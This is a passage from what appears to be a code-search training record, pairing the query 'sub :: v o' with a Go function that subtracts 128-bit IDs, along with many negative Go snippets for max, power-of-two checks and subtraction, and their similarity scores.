&& x != math.Inf(1) {\n\n\t\treturn true\n\t}\n\treturn false\n}", "func (s VectOp) Maxl(value float64) VectOp {\n\treturn fs.Maxl(s, value)\n}", "func IsPowerOfTwo(x int) bool{\n return (x != 0) && ((x & (x - 1)) == 0);\n}", "func IsPow2(x uint32) bool { return (x & (x - 1)) == 0 }", "func IsPowerOf2(x int32) bool {\n\treturn (x & (x - 1)) == 0\n}", "func add(a, b int) (value int, ok bool) {\n\tresult := a + b\n\t//Overflow if both arguments have the opposite sign of the result.\n\tif ((a ^ result) & (b ^ result)) < 0 {\n\t\treturn result, false\n\t}\n\n\treturn result, true\n}", "func equalFloat(x float64, y float64, limit float64) bool {\n\n\tif limit <= 0.0 {\n\t\tlimit = math.SmallestNonzeroFloat64\n\t}\n\n\treturn math.Abs(x-y) <= (limit * math.Min(math.Abs(x), math.Abs(y)))\n}", "func (v *Vector) Max(m *Vector) {\n\tif m.X > v.X {\n\t\tv.X = m.X\n\t}\n\tif m.Y > v.Y {\n\t\tv.Y = m.Y\n\t}\n\tif m.Z > v.Z {\n\t\tv.Z = m.Z\n\t}\n}", "func (v Vec) Max() float64 {\n\treturn v[1:].Reduce(func(a, e float64) float64 { return math.Max(a, e) }, v[0])\n}", "func isPowerOfTwo(n int) bool {\n\t// Accepted\n\t// 1108/1108 cases passed (0 ms)\n\t// Your runtime beats 100 % of golang submissions\n\t// Your memory usage beats 25 % of golang submissions (2.2 MB)\n\treturn n > 0 && (n&(n-1)) == 0\n}", "func PowerOfTwo(val int64) bool {\n\treturn val > 0 && val&(val-1) == 0\n}", "func IntCmpAbs(x *big.Int, y *big.Int,) int", "func Approx(x, y, prec float64) bool {\n\tif prec < 0 || 1 < prec {\n\t\tpanic(\"precision must be on range [0,1]\")\n\t}\n\n\treturn gomath.Abs(x-y) <= prec\n}", "func Max(x, y int64) int64 {\n if x > y {\n return x\n }\n return y\n}", "func (o *Object) Max_V(j int) float32 {\n\tx := float32(0)\n\tif len(o.v_list) != 0 {\n\t\t// initial value\n\t\tx = o.v_list[0].x[j]\n\t\tfor i := 0; i < len(o.v_list); i++ {\n\t\t\tif o.v_list[i].x[j] > x {\n\t\t\t\tx = o.v_list[i].x[j]\n\t\t\t}\n\t\t}\n\t}\n\treturn x\n}", "func Max(a, operand int) int {\n\tif a > operand {\n\t\treturn a\n\t}\n\treturn operand\n}", "func (w *writer) isMaxReached() bool {\n\tif w.max == 0 || w.count == 0 {\n\t\treturn false\n\t}\n\treturn w.count >= w.max\n}", "func (v *ValueRange) HasUpperBound() bool {\n\treturn v.upperEndPoint != nil\n}", "func (self *State)Max(a,b any)any{\n self.IncOperations(self.coeff[\"max\"]+self.off[\"max\"])\n return wrap2(a,b,math.Max)\n}", "func mulInt64WithOverflow(a, b int64) (c int64, ok bool) {\n\tconst mostPositive = 1<<63 - 1\n\tconst mostNegative = -(mostPositive + 1)\n\tc = a * b\n\tif a == 0 || b == 0 || a == 1 || b == 1 {\n\t\treturn c, true\n\t}\n\tif a == mostNegative || b == mostNegative {\n\t\treturn c, false\n\t}\n\treturn c, c/b == a\n}", "func max(x, y int64) int64 {\n\tif x < y {\n\t\treturn y\n\t}\n\treturn x\n}", "func maxi(x int, y int) int {\n if x >= y {\n return x\n } else {\n return y\n }\n}", "func TestIsEven_MaxUpper32(t *testing.T) {\n\tin := math.MaxInt32\n\texOut := false\n\teven := IsEven(in)\n\n\tif even != exOut {\n\t\tt.Errorf(\"Returned parity was incorrect, got: %t, want: %t.\", even, exOut)\n\t}\n}", "func Max(a uint64, b uint64) uint64 {\n\tif a > b {\n\t\treturn a\n\t}\n\treturn b\n}", "func (o *Object) HitTest(v Vec) bool {\n\tif o == nil {\n\t\treturn false\n\t}\n\treturn o.Pos.X <= v.X &&\n\t\to.Pos.X+o.Size.X >= v.X &&\n\t\to.Pos.Y <= v.Y &&\n\t\to.Pos.Y+o.Size.Y >= v.Y\n}", "func pow(x, n, lim float64) float64 {\n if v := math.Pow(x, n); v < lim {\n return v\n }\n return lim\n}", "func max(m, n int) (int, bool) {\n\tif m > n {\n\t\treturn m, true\n\t}\n\treturn n, false\n}", "func VeryCloseC128(a, b complex128) bool { return ToleranceC128(a, b, 4e-16) }", "func TestIsEven_MaxLower32(t *testing.T) {\n\tin := math.MinInt32\n\texOut := true\n\teven := IsEven(in)\n\n\tif even != exOut {\n\t\tt.Errorf(\"Returned parity was incorrect, got: %t, want: %t.\", even, exOut)\n\t}\n}", "func SatisfiesTargetValue(targetValue int64, minChange int64, utxos []*common.UTXO) bool {\n\ttotalValue := int64(0)\n\tfor _, utxo := range utxos {\n\t\ttotalValue += utxo.Value\n\t}\n\n\treturn (totalValue == targetValue || totalValue >= targetValue+minChange)\n}", "func (u UInt128) Equal(o *UInt128) bool {\n\treturn u.High == o.High && u.Low == o.Low\n}", "func Max(v, o Vec3) *Vec3 {\n\treturn Max(o, v)\n}", "func sum(a, b int) int {\n\tif v := a + b; v < SUMLIMIT {\n\t\treturn v\n\t}\n\treturn SUMLIMIT\n}", "func checkdivisibility(p, lb, ub *big.Int) bool {\n z := new (big.Int)\n for i := new(big.Int).Set(lb); i.Cmp(ub) == -1; i.Add(i, big.NewInt(1)) {\n z.Mod(p, i)\n if z.Cmp(big.NewInt(0)) == 0 {\n return true\n }\n }\n return false\n}", "func canJump(nums []int) bool {\n\t// 贪心:优化\n\t//can := len(nums) - 1\n\t//for i := can - 1; i >= 0; i-- {\n\t//\tif nums[i]+i >= can {\t// 当前值 + 当前位置 >= 上次可以的位置\n\t//\t\tcan = i\n\t//\t}\n\t//}\n\t//return can == 0\n\n\t// 贪心:\n\tmostFar := 0 // 能跳到最远的索引\n\tfor i := 0; i < len(nums); i++ {\n\t\tif i > mostFar { // 已经落后了\n\t\t\treturn false\n\t\t}\n\t\tif nums[i]+i >= mostFar { // 新记录\n\t\t\tmostFar = nums[i] + i\n\t\t\tif mostFar >= len(nums)-1 {\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t}\n\treturn false\n\n\t// dp:优化\n\t//n := len(nums)\n\t//if n == 1 {\n\t//\treturn true\n\t//}\n\t//needNum := 1\n\t//for i := n - 2; i >= 0; i-- {\n\t//\tif nums[i] >= needNum {\n\t//\t\tneedNum = 1\n\t//\t} else {\n\t//\t\tneedNum++\n\t//\t}\n\t//}\n\t//return nums[0] >= needNum\n\n\t// dp:\n\t//n := len(nums)\n\t//if n == 1 {\n\t//\treturn true\n\t//}\n\t//dp := make([]int, n)\n\t//dp[n-1] = 1\n\t//for i := n - 2; i >= 0; i-- {\n\t//\tif nums[i] >= dp[i+1] {\n\t//\t\tdp[i] = 1\n\t//\t} else {\n\t//\t\tdp[i] = dp[i+1] + 1\n\t//\t}\n\t//}\n\t//return nums[0] >= dp[0]\n\n\t// 暴力法\n\t//return false\n}", "func powerOf2(x int) bool {\n\tvar i int = 1\n\n\tfor i > 0 {\n\t\tif i == x {\n\t\t\treturn true\n\t\t}\n\t\ti <<= 1\n\t}\n\treturn false\n}", "func checkSignedBitfieldOverflow(value int64, incr int64, bits uint64, overflowType string) (int64, int) {\n\tvar (\n\t\tmax, min, maxincr, minincr int64\n\t)\n\n\tif bits == 64 {\n\t\tmax = math.MaxInt64\n\t} else {\n\t\tmax = int64(1<<(bits-1)) - 1\n\t}\n\tmin = -max - 1\n\tmaxincr = max - value\n\tminincr = min - value\n\n\t// Overflow process\n\tif value > max || (bits != 64 && incr > maxincr) || (value >= 0 && incr > 0 && incr > maxincr) {\n\t\tswitch overflowType {\n\t\tcase \"wrap\", \"fail\":\n\t\t\tmsb := uint64(1 << (bits - 1))\n\t\t\tmask := uint64(0xFFFFFFFFFFFFFFFF << (bits - 1))\n\t\t\tc := uint64(value) + uint64(incr)\n\t\t\tif c&msb > 0 {\n\t\t\t\tc |= mask\n\t\t\t} else {\n\t\t\t\tc &= ^mask\n\t\t\t}\n\t\t\treturn int64(c), 1\n\t\tcase \"sat\":\n\t\t\treturn max, 1\n\t\t}\n\t}\n\n\t// Underflow process\n\tif value < min || (bits != 64 && incr < minincr) || (value < 0 && incr < 0 && incr < minincr) {\n\t\tswitch overflowType {\n\t\tcase \"wrap\", \"fail\":\n\t\t\tmsb := uint64(1 << (bits - 1))\n\t\t\tmask := uint64(0xFFFFFFFFFFFFFFFF << (bits - 1))\n\t\t\tc := uint64(value) + uint64(incr)\n\t\t\tif c&msb > 0 {\n\t\t\t\tc |= mask\n\t\t\t} else {\n\t\t\t\tc &= ^mask\n\t\t\t}\n\t\t\treturn int64(c), 1\n\t\tcase \"sat\":\n\t\t\treturn min, -1\n\t\t}\n\t}\n\n\treturn incr + value, 0\n}", "func Max(a int, b int) int {\n if (b > a) {\n return b;\n }\n\n return a;\n}", "func Max(x, y int) int {\n if x < y {\n return y\n }\n return x\n}", "func Max(a, b int) int {\n\tif a-b > 0 {\n\t\treturn a\n\t}\n\n\treturn b\n}", "func checkProofOfWorkRange(target *big.Int, powLimit *big.Int) error {\n\t// The target difficulty must be larger than zero.\n\tif target.Sign() <= 0 {\n\t\tstr := fmt.Sprintf(\"target difficulty of %064x is too low\", target)\n\t\treturn ruleError(ErrUnexpectedDifficulty, str)\n\t}\n\n\t// The target difficulty must be less than the maximum allowed.\n\tif target.Cmp(powLimit) > 0 {\n\t\tstr := fmt.Sprintf(\"target difficulty of %064x is higher than max of \"+\n\t\t\t\"%064x\", target, powLimit)\n\t\treturn ruleError(ErrUnexpectedDifficulty, str)\n\t}\n\n\treturn nil\n}", "func (h *Heap) MaxHeapTest() bool {\n ok := true\n for i := h.num_nodes; i >= 0; i-- {\n node := h.data[i]\n if node < h.data[i * 2 + 1] || (len(h.data) > i * 2 + 2 && node < h.data[i * 2 + 2]) {\n ok = false\n break\n }\n }\n return ok\n}" ]
[ "0.59384793", "0.58904886", "0.58642787", "0.584234", "0.5744652", "0.56927615", "0.5617862", "0.5560207", "0.550647", "0.5500962", "0.54567045", "0.5416046", "0.5390327", "0.53597915", "0.5351312", "0.5327792", "0.5325286", "0.5323421", "0.5316553", "0.5291704", "0.5264823", "0.5243995", "0.52393395", "0.5195189", "0.51823664", "0.5174645", "0.51509833", "0.51353055", "0.50934", "0.50875074", "0.50666565", "0.50540936", "0.50329864", "0.50111", "0.5006086", "0.49807", "0.49740496", "0.49608168", "0.49536884", "0.49347022", "0.49325356", "0.49244592", "0.49205726", "0.4915791", "0.49137747", "0.48947453", "0.488829", "0.48828372", "0.48780376", "0.4877851", "0.48603907", "0.48570353", "0.48565528", "0.485314", "0.484783", "0.48442426", "0.48362753", "0.48322988", "0.4823964", "0.48207703", "0.4815242", "0.48104316", "0.48075718", "0.48048165", "0.4798683", "0.47929442", "0.47858942", "0.47777167", "0.4774465", "0.47711977", "0.4767837", "0.47568557", "0.47564253", "0.4750594", "0.47478545", "0.47470444", "0.47435486", "0.4735257", "0.47312403", "0.47309062", "0.4724243", "0.47174394", "0.47171685", "0.46982", "0.46969342", "0.46944433", "0.46918824", "0.46891493", "0.46807986", "0.4678115", "0.46769857", "0.46739462", "0.46694782", "0.4668497", "0.46675813", "0.46670735", "0.46637252", "0.46603957", "0.4657593", "0.46538866" ]
0.7086862
0
sub :: v o
func idSub(v, o id.ID) id.ID { low, borrow := bits.Sub64(v.Low, o.Low, 0) high, borrow := bits.Sub64(v.High, o.High, borrow) return id.ID{High: high, Low: low} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (v Vector) Sub(o Vector) *Vector {\n\treturn &Vector{v[0] - o[0], v[1] - o[1], v[2] - o[2]}\n}", "func (u Vec) Sub(v Vec) Vec {\n\treturn Vec{\n\t\tu.X - v.X,\n\t\tu.Y - v.Y,\n\t}\n}", "func (v Vec2) Sub(x Vec2) Vec2 {\n\treturn Vec2{v[0] - x[0], v[1] - x[1]}\n}", "func (v Vec2) Sub(other Vec2) Vec2 {\n\treturn Vec2{v.X - other.X, v.Y - other.Y}\n}", "func (v1 *Vec) Sub(v2 *Vec) *Vec {\n\treturn Sub(v1, v2)\n}", "func (v *V) Sub(x *V) *V {\n\tif !IsVSameShape(x, v) {\n\t\tpanic(ErrShape)\n\t}\n\tfor i, e := range x.Data {\n\t\tv.Data[i] -= e\n\t}\n\treturn v\n}", "func Sub(v1, v2 *Vec) *Vec {\n\tnegV2 := Negate(v2)\n\treturn Add(v1, negV2)\n}", "func (v Vec) Sub(other Vec) Vec {\n\treturn v.Copy().SubBy(other)\n}", "func (v *Vector) Sub(rhs *Vector) *Vector {\n\tif rhs == nil {\n\t\treturn v\n\t}\n\tif v == nil {\n\t\tv = &Vector{\n\t\t\tword: \"\",\n\t\t\tvec: make([]float64, len(rhs.vec)),\n\t\t\telems: nil,\n\t\t}\n\t}\n\n\tl := min(len(v.vec), len(rhs.vec))\n\tvec := make([]float64, l)\n\tcopy(vec, v.vec)\n\tsaxpy(l, -1, rhs.vec, 1, vec, 1)\n\telems := make([]string, len(v.elems)+len(rhs.elems))\n\telems = append(elems, rhs.elems...)\n\telems = append(elems, v.elems...)\n\treturn &Vector{\n\t\tword: v.word + \" - \" + rhs.word,\n\t\tvec: vec,\n\t\telems: elems,\n\t}\n}", "func Bvsub(t1 TermT, t2 TermT) TermT {\n\treturn TermT(C.yices_bvsub(C.term_t(t1), C.term_t(t2)))\n}", "func (v1 Vector2) Sub(v2 Vector2) Vector2 {\n\treturn Vector2{v1.X - v2.X, v1.Y - v2.Y}\n}", "func (v Vec3) Sub(w Vec3) Vec3 {\n\treturn Vec3{v[0] - w[0], v[1] - w[1], v[2] - w[2]}\n}", "func (a Vec2) Sub(b Vec2) Vec2 {\n\treturn Vec2{a.X - b.X, a.Y - b.Y}\n}", "func (v Vec3i) Sub(other Vec3i) Vec3i {\n\treturn Vec3i{v.X - other.X, v.Y - other.Y, v.Z - other.Z}\n}", "func (v1 Vec3) Sub(v2 Vec3) *Vec3 {\n\treturn &Vec3{e: [3]float32{v1.X() - v2.X(), v1.Y() - v2.Y(), v1.Z() - v2.Z()}}\n}", "func (v Posit16x2) Sub(x Posit16x2) Posit16x2 {\n\tout := Posit16x2{impl: make([]Posit16, 2)}\n\tfor i, posit := range v.impl {\n\t\tout.impl[i] = posit.Sub(x.impl[i])\n\t}\n\treturn out\n}", "func (u *Vec3) Sub(v *Vec3) *Vec3 {\n\ts := Vec3{\n\t\tu.X - v.X,\n\t\tu.Y - v.Y,\n\t\tu.Z - v.Z,\n\t}\n\treturn &s\n}", "func (vn *VecN) Sub(dst *VecN, addend *VecN) *VecN {\n\tif vn == nil || addend == nil {\n\t\treturn nil\n\t}\n\tsize := intMin(len(vn.vec), len(addend.vec))\n\tdst = dst.Resize(size)\n\n\tfor i := 0; i < size; i++ {\n\t\tdst.vec[i] = vn.vec[i] - addend.vec[i]\n\t}\n\n\treturn dst\n}", "func (n *bigNumber) sub(x *bigNumber, y *bigNumber) *bigNumber {\n\treturn n.subRaw(x, y).bias(2).weakReduce()\n}", "func (p Vector3) Sub(o Vector3) Vector3 {\n\treturn Vector3{p.X - o.X, p.Y - o.Y, p.Z - o.Z}\n}", "func (t Tuple) Sub(o Tuple) Tuple {\n\tif t.IsVector() && o.IsPoint() {\n\t\tpanic(\"cannot subtract point from vector\")\n\t}\n\treturn Tuple{t.X - o.X, t.Y - o.Y, t.Z - o.Z, t.W - o.W}\n}", "func (v Vec3) Sub(v2 Vec3) Vec3 {\n\treturn Vec3{X: v.X - v2.X, Y: v.Y - v2.Y, Z: v.Z - v2.Z}\n}", "func sub(x, y int) int {\n\treturn x - y\n}", "func (cal *Calculate) sub(value float64) (result float64) {\n\tif len(cal.Arg) == 2 {\n\t\treturn (cal.Arg[0] - cal.Arg[1])\n\t} else if len(cal.Arg) == 1 {\n\t\treturn (value - cal.Arg[0])\n\t}\n\n\tlog.Fatalln(\"Please check the data format of the calculation unit\")\n\treturn\n}", "func (v Posit8x4) Sub(x Posit8x4) Posit8x4 {\n\tout := Posit8x4{impl: make([]Posit8, 4)}\n\tfor i, posit := range v.impl {\n\t\tout.impl[i] = posit.Sub(x.impl[i])\n\t}\n\treturn out\n}", "func (z *Rat) Sub(x, y *Rat) *Rat {}", "func (t Torus) Sub(a, b Point) Point {\n\ta, b = t.normPair(a, b)\n\treturn a.Sub(b)\n}", "func (p *Point) Sub(p2 Point) {\n\tp.X -= p2.X\n\tp.Y -= p2.Y\n\tp.Z -= p2.Z\n}", "func (p *G2Jac) Sub(curve *Curve, a G2Jac) *G2Jac {\n\ta.Y.Neg(&a.Y)\n\tp.Add(curve, &a)\n\treturn p\n}", "func (v Vec) AbsSub(other Vec) Vec {\n\treturn v.Copy().AbsSubBy(other)\n}", "func (z *E12) Sub(x, y *E12) *E12 {\n\tz.C0.Sub(&x.C0, &y.C0)\n\tz.C1.Sub(&x.C1, &y.C1)\n\treturn z\n}", "func Sub(t1 TermT, t2 TermT) TermT {\n\treturn TermT(C.yices_sub(C.term_t(t1), C.term_t(t2)))\n}", "func (v Vector3D) Sub(other Vector3D) Vector3D {\n\treturn Vector3D{\n\t\tx: v.x - other.x,\n\t\ty: v.y - other.y,\n\t\tz: v.z - other.z,\n\t}\n}", "func (a Balance) Sub(b *Balance) Balance {\n\tfor i, v := range b {\n\t\ta[i] -= v\n\t}\n\treturn a\n}", "func (p *Point) Sub(to *Point) *Point {\n\treturn &Point{p.X - to.X, p.Y - to.Y}\n}", "func (a ImpactAmount) sub(b ImpactAmount) ImpactAmount {\n\tif b >= a {\n\t\treturn 0\n\t}\n\treturn a - b\n}", "func Sub(a, b Expr) Expr {\n\treturn &subOp{&simpleOperator{a, b, scanner.SUB}}\n}", "func Sub(z, x, y *Elt)", "func (z *InfraHamilton) Sub(x, y *InfraHamilton) *InfraHamilton {\n\tz.l.Sub(&x.l, &y.l)\n\tz.r.Sub(&x.r, &y.r)\n\treturn z\n}", "func Sub(V, W Vector) Vector {\n\tLengthCheck(V, W)\n\tX := make(Vector, len(V), len(V))\n\tfor i := range X {\n\t\tX[i] = V[i] - W[i]\n\t}\n\treturn X\n}", "func sub(x, y int) (answer int, err error) {\n\tanswer = x - y\n\treturn\n}", "func (z *BiComplex) Sub(x, y *BiComplex) *BiComplex {\n\tz.l.Sub(&x.l, &y.l)\n\tz.r.Sub(&x.r, &y.r)\n\treturn z\n}", "func (z *Int) Sub(x, y *Int) *Int {}", "func (c *Clac) Sub() error {\n\treturn c.applyFloat(2, func(vals []value.Value) (value.Value, error) {\n\t\treturn binary(vals[1], \"-\", vals[0])\n\t})\n}", "func (p Point2) Sub(ps ...Point2) Point2 {\n\tfor _, p2 := range ps {\n\t\tp[0] -= p2[0]\n\t\tp[1] -= p2[1]\n\t}\n\treturn p\n}", "func (n null) Sub(v Val) Val {\n\tpanic(ErrInvalidOpSubOnNil)\n}", "func Sub( a *context.Value, b *context.Value ) (*context.Value,error) {\n if a != nil && b != nil {\n switch a.OperationType( b ) {\n case context.VAR_BOOL:\n return context.IntValue( a.Int() - b.Int() ), nil\n case context.VAR_INT:\n return context.IntValue( a.Int() - b.Int() ), nil\n case context.VAR_FLOAT:\n return context.FloatValue( a.Float() - b.Float() ), nil\n case context.VAR_COMPLEX:\n return context.ComplexValue( a.Complex() - b.Complex() ), nil\n default:\n }\n }\n\n return nil, errors.New( \"Unsupported type for sub\" )\n}", "func Command_Sub(script *rex.Script, params []*rex.Value) {\n\tif len(params) != 2 {\n\t\trex.ErrorParamCount(\"float:sub\", \"2\")\n\t}\n\n\tscript.RetVal = rex.NewValueFloat64(params[0].Float64() - params[1].Float64())\n\treturn\n}", "func sub(a, b Poly) Poly {\n\tvar c Poly\n\tfor i := 0; i < n; i++ {\n\t\tc[i] = a[i] - b[i]\n\t}\n\treturn c\n}", "func (v Vec) SubBy(other Vec) Vec {\n\tassertSameLen(v, other)\n\tfor i, val := range other {\n\t\tv[i] -= val\n\t}\n\treturn v\n}", "func (d Duration) Sub(v Value) (Value, error) {\n\tif y, ok := v.GoValue().(time.Duration); ok {\n\t\tx := time.Duration(d)\n\t\treturn Duration(x - y), nil\n\t}\n\treturn nil, ErrOperationNotDefined\n}", "func (t *Tuple) Sub(o *Tuple) *Tuple {\n\treturn &Tuple{\n\t\tt.x - o.x,\n\t\tt.y - o.y,\n\t\tt.z - o.z,\n\t\tt.w - o.w,\n\t}\n\n}", "func (z *E6) Sub(x, y *E6) *E6 {\n\tz.B0.Sub(&x.B0, &y.B0)\n\tz.B1.Sub(&x.B1, &y.B1)\n\tz.B2.Sub(&x.B2, &y.B2)\n\treturn z\n}", "func (u UDim) Sub(v UDim) UDim {\n\treturn UDim{\n\t\tScale: u.Scale - v.Scale,\n\t\tOffset: u.Offset - v.Offset,\n\t}\n}", "func (z fermat) Sub(x, y fermat) fermat {\n\tif len(z) != len(x) {\n\t\tpanic(\"Add: len(z) != len(x)\")\n\t}\n\tn := len(y) - 1\n\tb := subVV(z[:n], x[:n], y[:n])\n\tb += y[n]\n\t// If b > 0, we need to subtract b<<n, which is the same as adding b.\n\tz[n] = x[n]\n\tif z[0] <= ^big.Word(0)-b {\n\t\tz[0] += b\n\t} else {\n\t\taddVW(z, z, b)\n\t}\n\tz.norm()\n\treturn z\n}", "func (z *polyGF2) Sub(a, b *polyGF2) *polyGF2 {\n\treturn z.Add(a, b)\n}", "func (p *G1Affine) Sub(a, b *G1Affine) *G1Affine {\n\tvar p1, p2 G1Jac\n\tp1.FromAffine(a)\n\tp2.FromAffine(b)\n\tp1.SubAssign(&p2)\n\tp.FromJacobian(&p1)\n\treturn p\n}", "func (z *Big) Sub(x, y *Big) *Big { return z.Context.Sub(z, x, y) }", "func (ai *Arith) Sub(decimal1 *ZnDecimal, others ...*ZnDecimal) *ZnDecimal {\n\tvar result = copyZnDecimal(decimal1)\n\tif len(others) == 0 {\n\t\treturn result\n\t}\n\n\tfor _, item := range others {\n\t\tr1, r2 := rescalePair(result, item)\n\t\tresult.co.Sub(r1.co, r2.co)\n\t\tresult.exp = r1.exp\n\t}\n\treturn result\n}", "func (v Vec) SSub(val float64) Vec {\n\treturn v.Copy().SSubBy(val)\n}", "func Sub(a int, b int) int {\n\treturn a - b\n}", "func Sub(a int, b int) int {\n\treturn a - b\n}", "func Sub(a int, b int) int {\n\treturn a - b\n}", "func (v *Vec3i) SetSub(other Vec3i) {\n\tv.X -= other.X\n\tv.Y -= other.Y\n\tv.Z -= other.Z\n}", "func Sub(x, y int) int {\n\treturn x - y\n}", "func (p Point) Sub(other Point) Point {\n\treturn Pt(p.X-other.X, p.Y-other.Y)\n}", "func (f *tmplFuncs) sub(x, y int) int { return x - y }", "func Sub(a, b int) int {\n\treturn a - b\n}", "func Sub(a, b int) int {\n\treturn a - b\n}", "func Sub(a, b int) int {\n\treturn a - b\n}", "func (a *EncryptedVec) Sub(b *EncryptedVec) (*EncryptedVec, error) {\n\n\tif len(a.Coords) != len(b.Coords) {\n\t\treturn nil, errors.New(\"cannot add vectors of different length\")\n\t}\n\n\tpk := a.Pk\n\tres := make([]*paillier.Ciphertext, len(a.Coords))\n\n\tfor i := range a.Coords {\n\t\tres[i] = pk.Sub(a.Coords[i], b.Coords[i])\n\t}\n\n\treturn &EncryptedVec{\n\t\tPk: pk,\n\t\tCoords: res,\n\t}, nil\n}", "func sub(a, b big.Int) big.Int {\n\treturn *big.NewInt(1).Sub(&a, &b)\n}", "func Sub(valueA gcv.Value, valueB gcv.Value) gcv.Value {\n\tif valueA.Type() == gcv.Complex || valueB.Type() == gcv.Complex {\n\t\treturn gcv.MakeValue(valueA.Complex() - valueB.Complex())\n\t}\n\treturn gcv.MakeValue(valueA.Real() - valueB.Real())\n}", "func VSUBSD(ops ...operand.Op) { ctx.VSUBSD(ops...) }", "func Subtract(v, u *Vec) *Vec {\n\treturn &Vec{\n\t\tv.X - u.X,\n\t\tv.Y - u.Y,\n\t}\n}", "func (p *EdwardsPoint) Sub(a, b *EdwardsPoint) *EdwardsPoint {\n\tvar (\n\t\tbPNiels projectiveNielsPoint\n\t\tdiff completedPoint\n\t)\n\treturn p.setCompleted(diff.SubEdwardsProjectiveNiels(a, bPNiels.SetEdwards(b)))\n}", "func (p Point) Sub(q Point) Point {\n\treturn Point{p.X - q.X, p.Y - q.Y}\n}", "func (p Point) Sub(q Point) Point {\n\treturn Point{p.X - q.X, p.Y - q.Y}\n}", "func TestSub(t *testing.T) {\n\tfmt.Println(Sub(2,1))\n}", "func (q1 Quat) Sub(q2 Quat) Quat {\n\treturn Quat{q1.W - q2.W, q1.V.Sub(q2.V)}\n}", "func (v *UtilBuilder) Sub(t time.Time) (res time.Time, err error) {\n\tif v.Operation != SUBOPERATION {\n\t\terr = errors.New(\"Invalid Operation\")\n\t\tres = t\n\t} else {\n\t\tswitch v.Leap {\n\t\tcase HOURLEAP:\n\t\t\tres = subHour(t, v.Step)\n\t\tcase DAYLEAP:\n\t\t\tres = subDay(t, v.Step)\n\t\tcase WEEKLEAP:\n\t\t\tres = subWeek(t, v.Step)\n\t\tcase YEARLEAP:\n\t\t\tres = subYear(t, v.Step)\n\t\tdefault:\n\t\t\terr = errors.New(\"Undefined Operation\")\n\t\t\tres = t\n\t\t}\n\t}\n\treturn\n}", "func (p Point) Sub(q Point) Point { return Point{p.X - q.X, p.Y - q.Y} }", "func (e *E6) Sub(cs *frontend.ConstraintSystem, e1, e2 *E6) *E6 {\n\n\te.B0.Sub(cs, &e1.B0, &e2.B0)\n\te.B1.Sub(cs, &e1.B1, &e2.B1)\n\te.B2.Sub(cs, &e1.B2, &e2.B2)\n\n\treturn e\n}", "func (x Dec) Sub(y Dec) (Dec, error) {\n\tvar z Dec\n\t_, err := apd.BaseContext.Sub(&z.dec, &x.dec, &y.dec)\n\treturn z, errorsmod.Wrap(err, \"decimal subtraction error\")\n}", "func (v *Vector2) Subtract(b Vector2) {\r\n\tv.x -= b.x\r\n\tv.y -= b.y\r\n}", "func Sub(out1 *LooseFieldElement, arg1 *TightFieldElement, arg2 *TightFieldElement) {\n\tx1 := ((0x1ffffffffff6 + arg1[0]) - arg2[0])\n\tx2 := ((0xffffffffffe + arg1[1]) - arg2[1])\n\tx3 := ((0xffffffffffe + arg1[2]) - arg2[2])\n\tout1[0] = x1\n\tout1[1] = x2\n\tout1[2] = x3\n}", "func VHSUBPD(mxy, xy, xy1 operand.Op) { ctx.VHSUBPD(mxy, xy, xy1) }", "func Sub(minuend, subtrahend *big.Int) *big.Int { return I().Sub(minuend, subtrahend) }", "func (c *Calculator) Sub() {\n\tif opValue, err := c.getOperationValue(); err != nil {\n\t\tc.returnError()\n\t} else {\n\t\tlog.Printf(\"%f - %f = \", value, opValue)\n\t\tvalue -= opValue\n\t\tlog.Printf(\"%f\\n\", value)\n\t\tc.returnResult()\n\t}\n}", "func (v Vector2) Subtract(other Vector) Vector {\r\n\totherv := checkVector2(other)\r\n\treturn Vector2{\r\n\t\tv[0] - otherv[0],\r\n\t\tv[1] - otherv[1],\r\n\t}\r\n}", "func (q Quat) Sub(other Quat) Quat {\n\treturn Quat{q.W - other.W, q.X - other.X, q.Y - other.Y, q.Z - other.Z}\n}", "func Sub(out1 *LooseFieldElement, arg1 *TightFieldElement, arg2 *TightFieldElement) {\n\tx1 := ((0x7fffff6 + arg1[0]) - arg2[0])\n\tx2 := ((0x7fffffe + arg1[1]) - arg2[1])\n\tx3 := ((0x7fffffe + arg1[2]) - arg2[2])\n\tx4 := ((0x7fffffe + arg1[3]) - arg2[3])\n\tx5 := ((0x7fffffe + arg1[4]) - arg2[4])\n\tout1[0] = x1\n\tout1[1] = x2\n\tout1[2] = x3\n\tout1[3] = x4\n\tout1[4] = x5\n}", "func (p Point) Sub(q Point) Point {\n\treturn Point{X: p.X - q.X, Y: p.Y - q.Y}\n}", "func karatsubaSub(z, x nat, n int) {\n\tif c := subVV(z[0:n], z, x); c != 0 {\n\t\tsubVW(z[n:n+n>>1], z[n:], c)\n\t}\n}", "func (f Fixed8) Sub(g Fixed8) Fixed8 {\n\treturn f - g\n}", "func (c *CSR) Sub(a, b mat.Matrix) {\n\tc.addScaled(a, b, 1, -1)\n}", "func (e *ConstantExpr) Sub(other *ConstantExpr) *ConstantExpr {\n\tassert(e.Width == other.Width, \"sub: width mismatch: %d != %d\", e.Width, other.Width)\n\treturn NewConstantExpr(e.Value-other.Value, e.Width)\n}", "func (z *Float64) Sub(x, y *Float64) *Float64 {\n\tz.l = x.l - y.l\n\tz.r = x.r - y.r\n\treturn z\n}", "func (ec *ECPoint) Sub(first, second *ECPoint) *ECPoint {\n\tec.checkNil()\n\tif first.Equal(second) {\n\t\tec.X = big.NewInt(0)\n\t\tec.Y = big.NewInt(0)\n\t\tec.Curve = first.Curve\n\t\treturn ec\n\t}\n\tnegation := new(ECPoint).Negation(second)\n\tec.X, ec.Y = first.Curve.Add(negation.X, negation.Y, first.X, first.Y)\n\tec.Curve = first.Curve\n\n\treturn ec\n}", "func Sub(a, b Expr) Expr {\n\treturn &arithmeticOperator{&simpleOperator{a, b, scanner.SUB}}\n}" ]
